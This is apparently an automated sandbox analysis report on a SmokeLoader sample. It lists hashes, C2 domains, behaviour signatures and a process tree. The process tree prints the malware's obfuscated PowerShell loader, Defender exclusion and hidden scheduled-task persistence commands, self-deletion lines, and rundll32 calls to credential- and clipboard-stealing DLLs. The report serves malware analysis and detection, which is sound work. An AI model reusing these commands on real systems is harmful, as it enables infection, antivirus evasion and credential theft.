Analysis
-
max time kernel
150s -
max time network
134s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
21-04-2023 08:10
Static task
static1
General
-
Target
f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe
-
Size
233KB
-
MD5
dde32f1cfa7b1a766a56cbe1d307f900
-
SHA1
1b6bde698b5bd12f8f42b370263ab07daf34bd7c
-
SHA256
f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8
-
SHA512
f5a11444cbda6dd18bce08cc2f94c15689a5ff46591ab80a35424a5a7d04ede41459ac2ed3d7beaf06cf01bb6da43f4a7e5449691740da2b6b40ea5ec20162a3
-
SSDEEP
3072:NMgmld1lPXghcsdc59bR1B/sTCpuODWiFPY8SH5pRD/Pbp1:lmldX63E9d1WmuIGfRrPbp1
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Deletes itself 1 IoCs
pid Process 3188 Process not Found -
Executes dropped EXE 3 IoCs
pid Process 2068 1BC5.bat.exe 4472 olTsz.bat.exe 2540 hwqo1whc.hnm.exe -
Loads dropped DLL 9 IoCs
pid Process 4168 rundll32.exe 4200 rundll32.exe 1092 rundll32.exe 3228 rundll32.exe 5024 rundll32.exe 624 rundll32.exe 4160 rundll32.exe 2852 rundll32.exe 2728 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3352 5024 WerFault.exe 108 3432 2852 WerFault.exe 105 4932 624 WerFault.exe 107 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings 1BC5.bat.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2496 f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe 2496 f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3188 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 2496 f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found 3188 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3188 Process not Found Token: SeCreatePagefilePrivilege 3188 Process not Found Token: SeDebugPrivilege 2068 1BC5.bat.exe Token: SeShutdownPrivilege 3188 Process not Found Token: SeCreatePagefilePrivilege 3188 Process not Found Token: SeDebugPrivilege 5064 powershell.exe Token: SeDebugPrivilege 4124 powershell.exe Token: SeShutdownPrivilege 3188 Process not Found Token: SeCreatePagefilePrivilege 3188 Process not Found Token: SeDebugPrivilege 4984 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 powershell.exe Token: SeSecurityPrivilege 4984 powershell.exe Token: SeTakeOwnershipPrivilege 4984 powershell.exe Token: SeLoadDriverPrivilege 4984 powershell.exe Token: SeSystemProfilePrivilege 4984 powershell.exe Token: SeSystemtimePrivilege 4984 powershell.exe Token: SeProfSingleProcessPrivilege 4984 powershell.exe Token: SeIncBasePriorityPrivilege 4984 powershell.exe Token: SeCreatePagefilePrivilege 4984 powershell.exe Token: SeBackupPrivilege 4984 powershell.exe Token: SeRestorePrivilege 4984 powershell.exe Token: SeShutdownPrivilege 4984 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeSystemEnvironmentPrivilege 4984 powershell.exe Token: SeRemoteShutdownPrivilege 4984 powershell.exe Token: SeUndockPrivilege 4984 powershell.exe Token: SeManageVolumePrivilege 4984 powershell.exe Token: 33 4984 powershell.exe Token: 34 4984 powershell.exe Token: 35 4984 powershell.exe Token: 36 4984 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeIncreaseQuotaPrivilege 2076 powershell.exe Token: SeSecurityPrivilege 2076 powershell.exe Token: SeTakeOwnershipPrivilege 2076 powershell.exe Token: SeLoadDriverPrivilege 2076 powershell.exe Token: SeSystemProfilePrivilege 2076 powershell.exe Token: SeSystemtimePrivilege 2076 powershell.exe Token: SeProfSingleProcessPrivilege 2076 powershell.exe Token: SeIncBasePriorityPrivilege 2076 powershell.exe Token: SeCreatePagefilePrivilege 2076 powershell.exe Token: SeBackupPrivilege 2076 powershell.exe Token: SeRestorePrivilege 2076 powershell.exe Token: SeShutdownPrivilege 2076 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeSystemEnvironmentPrivilege 2076 powershell.exe Token: SeRemoteShutdownPrivilege 2076 powershell.exe Token: SeUndockPrivilege 2076 powershell.exe Token: SeManageVolumePrivilege 2076 powershell.exe Token: 33 2076 powershell.exe Token: 34 2076 powershell.exe Token: 35 2076 powershell.exe Token: 36 2076 powershell.exe Token: SeIncreaseQuotaPrivilege 2076 powershell.exe Token: SeSecurityPrivilege 2076 powershell.exe Token: SeTakeOwnershipPrivilege 2076 powershell.exe Token: SeLoadDriverPrivilege 2076 powershell.exe Token: SeSystemProfilePrivilege 2076 powershell.exe Token: SeSystemtimePrivilege 2076 powershell.exe Token: SeProfSingleProcessPrivilege 2076 powershell.exe Token: SeIncBasePriorityPrivilege 2076 powershell.exe Token: SeCreatePagefilePrivilege 2076 powershell.exe Token: SeBackupPrivilege 2076 powershell.exe Token: SeRestorePrivilege 2076 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3188 wrote to memory of 4016 3188 Process not Found 66 PID 3188 wrote to memory of 4016 3188 Process not Found 66 PID 4016 wrote to memory of 5100 4016 cmd.exe 68 PID 4016 wrote to memory of 5100 4016 cmd.exe 68 PID 5100 wrote to memory of 2068 5100 cmd.exe 70 PID 5100 wrote to memory of 2068 5100 cmd.exe 70 PID 5100 wrote to memory of 2068 5100 cmd.exe 70 PID 3188 wrote to memory of 2800 3188 Process not Found 71 PID 3188 wrote to memory of 2800 3188 Process not Found 71 PID 3188 wrote to memory of 2800 3188 Process not Found 71 PID 3188 wrote to memory of 2800 3188 Process not Found 71 PID 3188 wrote to memory of 3944 3188 Process not Found 72 PID 3188 wrote to memory of 3944 3188 Process not Found 72 PID 3188 wrote to memory of 3944 3188 Process not Found 72 PID 3188 wrote to memory of 4028 3188 Process not Found 73 PID 3188 wrote to memory of 4028 3188 Process not Found 73 PID 3188 wrote to memory of 4028 3188 Process not Found 73 PID 3188 wrote to memory of 4028 3188 Process not Found 73 PID 3188 wrote to memory of 3900 3188 Process not Found 74 PID 3188 wrote to memory of 3900 3188 Process not Found 74 PID 3188 wrote to memory of 3900 3188 Process not Found 74 PID 3188 wrote to memory of 352 3188 Process not Found 75 PID 3188 wrote to memory of 352 3188 Process not Found 75 PID 3188 wrote to memory of 352 3188 Process not Found 75 PID 3188 wrote to memory of 352 3188 Process not Found 75 PID 3188 wrote to memory of 3776 3188 Process not Found 76 PID 3188 wrote to memory of 3776 3188 Process not Found 76 PID 3188 wrote to memory of 3776 3188 Process not Found 76 PID 3188 wrote to memory of 3776 3188 Process not Found 76 PID 3188 wrote to memory of 4248 3188 Process not Found 77 PID 3188 wrote to memory of 4248 3188 Process not Found 77 PID 3188 wrote to memory of 4248 3188 Process not Found 77 PID 3188 wrote to memory of 4248 3188 Process not Found 77 PID 2068 wrote to memory of 4124 2068 1BC5.bat.exe 78 PID 2068 wrote to memory of 4124 2068 1BC5.bat.exe 78 PID 2068 wrote to memory of 4124 2068 1BC5.bat.exe 78 PID 2068 wrote to memory of 5064 2068 1BC5.bat.exe 80 PID 2068 wrote to memory of 5064 2068 1BC5.bat.exe 80 PID 2068 wrote to memory of 5064 2068 1BC5.bat.exe 80 PID 3188 wrote to memory of 1472 3188 Process not Found 82 PID 3188 wrote to memory of 1472 3188 Process not Found 82 PID 3188 wrote to memory of 1472 3188 Process not Found 82 PID 3188 wrote to memory of 2140 3188 Process not Found 83 PID 3188 wrote to memory of 2140 3188 Process not Found 83 PID 3188 wrote to memory of 2140 3188 Process not Found 83 PID 3188 wrote to memory of 2140 3188 Process not Found 83 PID 2068 wrote to memory of 4984 2068 1BC5.bat.exe 84 PID 2068 wrote to memory of 4984 2068 1BC5.bat.exe 84 PID 2068 wrote to memory of 4984 2068 1BC5.bat.exe 84 PID 2068 wrote to memory of 2076 2068 1BC5.bat.exe 86 PID 2068 wrote to memory of 2076 2068 1BC5.bat.exe 86 PID 2068 wrote to memory of 2076 2068 1BC5.bat.exe 86 PID 2068 wrote to memory of 4040 2068 1BC5.bat.exe 88 PID 2068 wrote to memory of 4040 2068 1BC5.bat.exe 88 PID 2068 wrote to memory of 4040 2068 1BC5.bat.exe 88 PID 4040 wrote to memory of 4376 4040 WScript.exe 89 PID 4040 wrote to memory of 4376 4040 WScript.exe 89 PID 4040 wrote to memory of 4376 4040 WScript.exe 89 PID 4376 wrote to memory of 4472 4376 cmd.exe 91 PID 4376 wrote to memory of 4472 4376 cmd.exe 91 PID 4376 wrote to memory of 4472 4376 cmd.exe 91 PID 4472 wrote to memory of 720 4472 olTsz.bat.exe 92 PID 4472 wrote to memory of 720 4472 olTsz.bat.exe 92 PID 4472 wrote to memory of 720 4472 olTsz.bat.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe"C:\Users\Admin\AppData\Local\Temp\f19f57debb7a888865e350f874081a816f3aefc9e06d194eed062894b04922a8.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2496
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1BC5.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1BC5.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\1BC5.bat.exe"C:\Users\Admin\AppData\Local\Temp\1BC5.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2068);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1BC5')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_olTsz' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\olTsz.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\olTsz.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\olTsz.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Users\Admin\AppData\Roaming\olTsz.bat.exe"C:\Users\Admin\AppData\Roaming\olTsz.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4472);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵PID:720
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵PID:4380
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\olTsz')7⤵PID:628
-
-
C:\Users\Admin\AppData\Local\Temp\hwqo1whc.hnm.exe"C:\Users\Admin\AppData\Local\Temp\hwqo1whc.hnm.exe"7⤵
- Executes dropped EXE
PID:2540 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main8⤵
- Loads dropped DLL
PID:3228 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main9⤵
- Loads dropped DLL
PID:2852 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2852 -s 49210⤵
- Program crash
PID:3432
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main8⤵
- Loads dropped DLL
PID:4200 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main9⤵
- Loads dropped DLL
PID:5024 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5024 -s 59610⤵
- Program crash
PID:3352
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main8⤵
- Loads dropped DLL
PID:4168 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main9⤵
- Loads dropped DLL
PID:624 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 624 -s 60010⤵
- Program crash
PID:4932
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\clip64.dll, Main8⤵
- Loads dropped DLL
PID:4160
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\clip64.dll, Main8⤵
- Loads dropped DLL
PID:1092
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\clip64.dll, Main8⤵
- Loads dropped DLL
PID:2728
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2540);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵PID:352
-
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2800
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3944
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4028
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3900
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:352
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3776
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4248
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1472
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2140
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
45KB
MD55f640bd48e2547b4c1a7421f080f815f
SHA1a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a
SHA256916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c
SHA512a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e
-
Filesize
15KB
MD5ea806867fe6395a66f3db692d6bc9953
SHA19db6e5e004e88a1ac1756fc4dd02844e736f257b
SHA256c2e50d992ab4f5542044a07a41da01cde39acb248ca91e7c0854b03401b86a30
SHA5122f16b2c2aea07d2bcb5ab581bf4741b274683e638cce21167840a2120a7e5cba00ecf6edae533051ded0918aa5b5a76949d9ab2acb0401ff589e2bf0a77ba1dd
-
Filesize
17KB
MD57890a64273ed66953699a255cee63637
SHA17e27748795eaecfa2eef2a93a78c78f601431e76
SHA256e277be51f8f93ff9fdf07f2c970d5402954845174de20a347d8b6e0fc4c3cdf2
SHA5129e2a67c5cc7083c2d5e1c8a666260ceeccf8955c8b93b28de2e47773736dd04f8b62474940aca7aee2c45c58b17f02fbb33b55884653426c963bd43a4dc0f590
-
Filesize
16KB
MD5e196d53ddd4a0f75df3c23b36730f964
SHA1969f7011136727b211c5e56fc0aa518d640a6d22
SHA256cdf4ce009f54a24afcd8e7e060f4a21948822e1591d94360d831fca625499928
SHA512504b25c1f49bfc164e0e9c455e3ace05f5068c940eaced164056a634cfb6824da8741ece9d67e6d4f2bec748c0611b028c6bf32055a5217884be583b50bbfe1b
-
Filesize
16KB
MD5e196d53ddd4a0f75df3c23b36730f964
SHA1969f7011136727b211c5e56fc0aa518d640a6d22
SHA256cdf4ce009f54a24afcd8e7e060f4a21948822e1591d94360d831fca625499928
SHA512504b25c1f49bfc164e0e9c455e3ace05f5068c940eaced164056a634cfb6824da8741ece9d67e6d4f2bec748c0611b028c6bf32055a5217884be583b50bbfe1b
-
Filesize
18KB
MD5854e05580934c5520b91699e3cc28c73
SHA14120b6a0e9f5048114ea991021691cfee6854018
SHA256fc2404b5944fa2fa2b74ab30c7ebc990dc0620a898d7cf2594ddb904ac4f82ef
SHA5121dfe4dc2af65d6e11ea908b954388279423ae3aa27f1f262ac894468d2d663ffeca6bac07a95919408718871a2657dd0e4bb8188a76c81fbdc7916ad46c3e236
-
Filesize
19KB
MD59edfbd9f8b42b7cfbd4db1b370dfa4c3
SHA1af7ce67c1b62a421575bb27ecd864a52087111b8
SHA2568b85abae1a639f306d3b26a953d1acd254a2dd09331ed2ad29d4d46cf0619c6c
SHA512a158acd3c9d9e401778033962b6c2d05aca4d093772bab84464d9eda27255ec312f58a782320805a0fd2937600ccf60b73f5c46428ad27107d9c8e8a31bc86d4
-
Filesize
17KB
MD5369458a9d5df78b36262e40300188808
SHA131e64280de0560a1e3c41858a3e6d9a8f8341245
SHA2560cdab7ba1f289cb0b6d2a90f3caf7342cad97acde53a864c422b1fd916e2feb8
SHA5122ed3014faac4cb1efce6b4ad79c3b90dcf3acc0fd7ab9cc5edd893b0a220b075be8e37c371454d05978866aa04a0adc16f5dbaa6b5242023eb371dbb3a6ef937
-
Filesize
17KB
MD5369458a9d5df78b36262e40300188808
SHA131e64280de0560a1e3c41858a3e6d9a8f8341245
SHA2560cdab7ba1f289cb0b6d2a90f3caf7342cad97acde53a864c422b1fd916e2feb8
SHA5122ed3014faac4cb1efce6b4ad79c3b90dcf3acc0fd7ab9cc5edd893b0a220b075be8e37c371454d05978866aa04a0adc16f5dbaa6b5242023eb371dbb3a6ef937
-
Filesize
352KB
MD52115cc47f7ef6e7152e2326de4f32f2a
SHA1ed68fa31b9f635cdeb3a26710c2ec9689dcb8f97
SHA2566ae23d8550d0f10cd34797e5821fd78a2d50236e9f8a931a398f8f26daffbfad
SHA5121c3727cfa39dc010dec742f0f98eba3d881a7802ed59c28b74daa514b71dee8e62e8ba21514ecb2bd9ae3a765b4d029f29ceee1f2865714c10255d6820811012
-
Filesize
420KB
MD5be8ffebe1c4b5e18a56101a3c0604ea0
SHA12ec8af7c1538974d64291845dcb02111b907770f
SHA256d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA51271008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb
-
Filesize
420KB
MD5be8ffebe1c4b5e18a56101a3c0604ea0
SHA12ec8af7c1538974d64291845dcb02111b907770f
SHA256d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
